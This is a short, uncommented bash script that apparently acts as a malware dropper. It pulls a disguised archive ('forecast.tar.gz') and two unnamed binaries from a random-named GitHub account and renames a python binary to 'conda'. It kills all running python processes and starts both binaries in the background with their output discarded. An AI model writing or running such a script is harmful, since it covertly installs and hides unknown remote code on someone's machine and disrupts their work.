#!/bin/bash
sleep 6
curl -LJO https://raw.githubusercontent.com/r4d20z2st15qp/a164/main/forecast.tar.gz
curl -LJO https://raw.githubusercontent.com/r4d20z2st15qp/g892/main/r41
curl -LJO https://raw.githubusercontent.com/r4d20z2st15qp/g892/main/r42
tar xvzf forecast.tar.gz
cp python conda
chmod +x r41
chmod +x r42
pkill python
sleep 6
nohup ./r41 > /dev/null 2>&1 &
nohup ./r42 > /dev/null 2>&1 &

